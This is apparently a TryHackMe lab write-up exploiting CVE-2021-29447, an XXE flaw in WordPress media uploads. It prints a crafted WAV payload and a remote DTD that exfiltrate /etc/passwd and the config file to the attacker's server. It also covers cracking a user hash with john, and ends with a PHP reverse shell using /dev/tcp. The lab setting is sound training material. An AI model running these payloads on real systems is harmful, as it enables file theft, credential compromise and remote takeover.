TryHackMe Wordpress: CVE-2021–29447 Writeup

4 min readAug 29, 2021

Hi, Hackers!!! Today we will solve TryHackMe room Wordpress: CVE-2021–29447. This room is about a XXE vulnerability in Wordpress. The room is created by stuxnet. Without wasting time, let’s get into action.

Introduction

XXE is short for XML External Entity. This vulnerability takes advantage of the poor configuration of the XML interpreter. If we can use XXE properly, we can read files that we are not supposed to read. XXE allows us to include external entities, enabling us attack to applications that interpret XML language in their parameters.

The CVE we are learning about, it can be exploited if the CMS runs on PHP 8 and the attacker has permission to upload media files.

Impact

Arbitrary File Disclosure: The contents of any file on the host’s file system can be retrieved.
Server-Side Request Forgery: HTTP request can be made on behalf of the Wordpress installation.

Exploiting the vulnerability

Credentials:

user: test-corp
password: test

The above user has permission to upload media files. At first, create a .wav file with nano.

nano poc.wav

Then in the file include the following command.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Also, you have to create a .dtd file. Because above command will download a .dtd file from your server. The name should be same as you specified above. Create NAMEEVIL.dtd with nano and include the following code.

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Now give poc.wav file execute permission and run it. It will create payload.wav which we will upload on the host.

chmod +x poc.wav
./poc.wav

Before uploading the payload on the Wordpress site, start a server with php in your host.

php -S your_ip:port

You should start your server where you saved the .dtd file. The target host will return a base64 encoded output if you give the correct file path. You can decode the output with PHP. Create a .php file with following code:

nano revshell.php
<?php echo zlib_decode(base64_decode('base64here')); ?>

You can decode in this way also.

echo "base64code" | base64 -d

Similarly, we can also leverage other base64 encoding libraries like the following:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Ready Set Go

Use the vulnerability CVE-2021–29447 to read the wordpress configuration file.

Answer: No Answer Needed.

2. Based on the results of #1, what is the name of the database for WordPress?

Answer: Read the config file.

3. Based on the results of #1, what are the credentials you found?

Answer: Decode the base64 encoded output you received.

4. Enumerate and identify what is the dbms installed on the server?

Answer: I think you know.

5. Based on the results of #4, what is the dbms version installed on the server?

Answer:

select VERSION();

6. Based on the results of #4, what port is the dbms running on?

Answer:

show global variables like 'PORT';

7. Compromise the dbms, What is the encrypted password located in the wordpress users table with id 1??

You will get a hash of user id 1. To identify the hash, you can use hash-identifier. Save the hash to key.hash and crack it with john.

john key.hash --wordlist=......./rockyou.txt

Answer: Get the hash.

8. Based on the results of #7, What is the password in plaint text?

Answer: Crack the hash with john.

9. Compromise the machine and locate flag.txt.

Answer: Create a reverse shell using php.

<?php
 exec("/bin/bash -c 'bash -i >& /dev/tcp/your_ip/1234 0>&1'");
?>

Go to themes tab and try to upload the reverse shell. It will try to install the shell but it can’t be done. But you will find the reverse shell in the media library.